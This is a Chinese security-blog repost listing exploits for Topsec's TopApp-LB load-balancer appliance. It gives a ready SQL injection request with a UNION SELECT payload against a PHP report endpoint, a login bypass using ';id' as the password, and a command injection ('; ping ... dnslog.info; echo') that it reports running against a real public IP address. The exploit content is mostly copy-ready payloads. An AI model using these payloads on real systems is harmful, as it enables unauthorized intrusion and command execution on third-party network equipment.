天融信TopApp-LB 负载均衡系统Sql注入漏洞

admin 2022年1月6日01:02:47安全博客评论18 views834字阅读2分46秒阅读模式

image-20200913015312879

1
POST /acc/clsf/report/datasource.php HTTP/1.1Host: localhostConnection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencoded t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

网友称以下两个历史漏洞仍然可以复现。

https://www.uedbox.com/post/21626/

简要描述:

天融信负载均衡TopApp-LB系统无需密码直接登陆

详细说明:

.../.../.../https://.../

1
用户名随意  密码:;id

漏洞证明:

img

img

img

https://www.uedbox.com/post/22193/

TopApp-LB负载均衡(绝对是随机找的)https://101.231.40.234/执行命令

执行命令

1
; ping 9928e5.dnslog.info; echo

img

命令被成功执行,效果如图。

img

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:02:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  天融信TopApp-LB 负载均衡系统Sql注入漏洞 http://cn-sec.com/archives/720875.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: